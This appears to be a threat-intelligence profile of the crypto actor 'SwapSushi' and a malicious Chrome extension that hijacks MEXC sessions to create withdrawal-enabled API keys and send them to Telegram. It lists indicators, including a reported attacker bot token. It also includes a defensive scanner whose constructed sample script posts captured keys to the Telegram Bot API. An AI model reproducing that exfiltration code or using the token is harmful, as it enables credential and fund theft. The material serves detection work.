Mallory

SwapSushi

Also known as: swapsushi

SwapSushi is a crypto-focused threat actor/cluster (moderate-confidence linkage) associated with the “SwapSushi” brand across Telegram bots and other social/infrastructure. Socket’s Threat Research Team linked this cluster to a malicious Google Chrome extension, “MEXC API Automator,” published on the Chrome Web Store on 2025-09-01 by the handle “jorjortan142” (developer contact: jorjortan142@gmail[.]com; extension ID: pppdfgkfdemgfknfnhpkibbkabhghhfh).

The extension targets users of the MEXC cryptocurrency exchange by abusing the victim’s authenticated browser session on mexc.com to programmatically create new API keys, enable broad permissions including withdrawals, and then deceive the user by manipulating the UI to display withdrawal permissions as disabled while keeping them enabled server-side. After key creation, it extracts the Access Key and Secret Key from the MEXC success modal and exfiltrates them via HTTPS POST to the Telegram Bot API (hardcoded bot token 7534112291:AAF46jJWWo95XsRWkzcPevHW7XNo6cqKG9I; chat ID 6526634583), giving the actor programmatic control to execute trades and initiate withdrawals to drain victim funds without needing passwords or bypassing 2FA (it waits for the user to complete 2FA normally).

Code analysis noted numerous Russian-language inline comments; Socket assessed with moderate confidence that the developer/operator is Russian-speaking, without making country-level attribution. Reported related SwapSushi-linked infrastructure/social includes t[.]me/swapsushibot, swapsushi[.]net, and an X handle @jorjortan142 (display name “sushi.crypto”).
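The behaviour described above (an exchange-targeting extension that carries a hardcoded Telegram bot token, posts to the Telegram Bot API, and contains Russian-language comments) can be triaged with static checks against an unpacked extension. The following is an added example written for this page; it is not Socket’s tooling nor code from the extension. The manifest and script it scans are constructed samples that only imitate the reported traits, and the bot token and chat ID in them are made-up placeholders of the same shape, not the values from the report.

```python
import json
import re

# Constructed sample manifest: an extension asking for both the exchange origin
# and the Telegram Bot API origin (assumed shape; not the real manifest).
SAMPLE_MANIFEST = json.dumps({
    "manifest_version": 3,
    "name": "Example API Automator",
    "host_permissions": ["https://www.mexc.com/*", "https://api.telegram.org/*"],
})

# Constructed sample content script. The token/chat id are placeholders chosen
# to match the Telegram bot-token format (digits ':' 35 token chars).
SAMPLE_SCRIPT = r"""
// отправить ключи в телеграм  (Cyrillic comment, as the report describes)
const TOKEN = "1234567890:AAExampleExampleExampleExampleExamp";
const CHAT = "111111111";
fetch("https://api.telegram.org/bot" + TOKEN + "/sendMessage", {
  method: "POST",
  body: JSON.stringify({chat_id: CHAT, text: capturedKeys})
});
"""

# Telegram bot tokens: 8-10 digit bot id, colon, 35 chars of [A-Za-z0-9_-].
TELEGRAM_TOKEN_RE = re.compile(
    r"(?<![A-Za-z0-9_])\d{8,10}:[A-Za-z0-9_-]{35}(?![A-Za-z0-9_-])"
)
TELEGRAM_BOT_API_RE = re.compile(r"api\.telegram\.org/bot")
# A line comment that contains at least one Cyrillic character.
CYRILLIC_COMMENT_RE = re.compile(r"//[^\n]*[\u0400-\u04FF]")

EXCHANGE_HINTS = ("mexc.com",)          # extend with other exchange origins as needed
MESSAGING_HINTS = ("api.telegram.org",)


def scan_manifest(manifest_json: str) -> list[str]:
    """Flag a manifest whose host permissions span an exchange and a messaging API."""
    manifest = json.loads(manifest_json)
    perms = list(manifest.get("host_permissions", [])) + list(manifest.get("permissions", []))
    touches_exchange = any(h in p for p in perms for h in EXCHANGE_HINTS)
    touches_messaging = any(h in p for p in perms for h in MESSAGING_HINTS)
    findings = []
    if touches_exchange and touches_messaging:
        findings.append("manifest: host permissions cover an exchange origin and the Telegram Bot API")
    return findings


def scan_script(source: str) -> list[str]:
    """Flag hardcoded bot tokens, Bot API calls and Cyrillic comments in a script."""
    findings = []
    for match in TELEGRAM_TOKEN_RE.finditer(source):
        # Only the bot-id prefix is reported so the token itself is not copied into logs.
        findings.append(f"hardcoded Telegram bot token: {match.group(0).split(':')[0]}:...")
    if TELEGRAM_BOT_API_RE.search(source):
        findings.append("outbound request to api.telegram.org/bot<token> (exfiltration channel)")
    if CYRILLIC_COMMENT_RE.search(source):
        findings.append("Cyrillic inline comment(s) present")
    return findings


def scan_extension(manifest_json: str, scripts: dict[str, str]) -> dict[str, list[str]]:
    """Run both scanners over an unpacked extension; keys are file names."""
    report = {"manifest.json": scan_manifest(manifest_json)}
    for name, src in scripts.items():
        report[name] = scan_script(src)
    return {k: v for k, v in report.items() if v}


if __name__ == "__main__":
    for path, hits in scan_extension(SAMPLE_MANIFEST, {"content.js": SAMPLE_SCRIPT}).items():
        for hit in hits:
            print(f"{path}: {hit}")
```

In practice the manifest and scripts would be read from the unpacked extension directory (or from a `.crx` after unzipping), and the hint tuples widened to the exchanges a given user base actually uses. A match on the token pattern alone is enough to treat the extension as hostile; the permission overlap and comment-language checks add supporting context for the analyst.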

Are they targeting you?

Know when an actor pivots toward your sector

Mallory correlates actor tradecraft and target patterns against your stack, your sector, and your geography. See overlap before they land.

What this page doesn’t show

The version that knows your environment.

This page is what’s public. Mallory adds the parts that aren’t: sector and geo overlap with your footprint, the IOCs they’re burning right now, detection coverage, and what to do next.
Target overlap

Match sector + geo + tech-stack targeting against your real footprint.

Tradecraft mapping

Every observed MITRE ATT&CK technique, grouped by tactic.

Malware arsenal

Families this actor is known to deploy, with IOCs and behavior.

Exploited CVEs

CVEs this actor has used in known campaigns.

Detection signatures

YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.

Observables

Domains, IPs, and hashes tied to this actor, refreshed continuously.